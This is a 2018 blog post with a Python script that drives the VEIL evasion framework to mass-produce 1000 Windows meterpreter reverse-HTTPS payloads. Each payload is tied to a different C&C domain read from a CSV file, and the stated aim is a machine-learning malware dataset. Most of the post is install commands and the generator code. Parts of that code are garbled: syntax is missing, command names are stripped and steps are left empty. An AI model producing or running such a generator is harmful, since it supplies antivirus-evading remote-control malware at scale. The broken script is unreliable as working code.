Saturday, August 11, 2018

Automating generation of VEIL payloads

This post serves as a journal of the technique used for automating generation of VEIL payloads.

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus. 

1) On a Kali Linux VM
2) Install VEIL framework

apt update
apt -y install veil
/usr/share/veil/config/ --force --silent

3) Open gedit and copy the below python script. Save the script to veil directory (/usr/share/veil)

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
print ("Loaded domain name file")

correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

startfrom = 0

for index, row in df.iterrows():
 if startfrom > index:
  print ("skip: "+str(row[1]))

 attempt = 1
 #uncomment the 2 lines below to use the resolved ip address instead 
  addr = socket.gethostbyname(row[0])
 except socket_error as serr:  
  if serr.errno == -2:
   print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
   row[0] = ""

 command = "-t Evasion -p cs/meterpreter/ --ip " + row[0] + " --port 443" 
 binaryname = str(row[1])+".exe"
 print (command)
 #set i to any positive number to start the loop  
 i = 9999
 x = -1
 while x == -1:
  proc = subprocess.Popen(['./','-t','Evasion','-p','cs/meterpreter/','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  tmp = proc.communicate()[0]
  x = tmp.find(correctmsg)
  #-1 represent errmsg is not found thus implying that crafting is successful
  i = tmp.find(errmsg)
  #print ("i value:" + str(i))

  if i != -1 :
   print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
   attempt = attempt + 1 
  if x == -1 :
   print ("error: " + tmp)
   attempt = attempt + 1 

 print ("Command: " + command + " is successful.")
 print ("Saving as :" + binaryname)'mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
 print ("Saved")
 print ("")

4) Create a csv file using excel with the following format and save it as website.csv: 

5) Execute the Python script 

cd /usr/share/veil

6) Generated malware are saved at /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.

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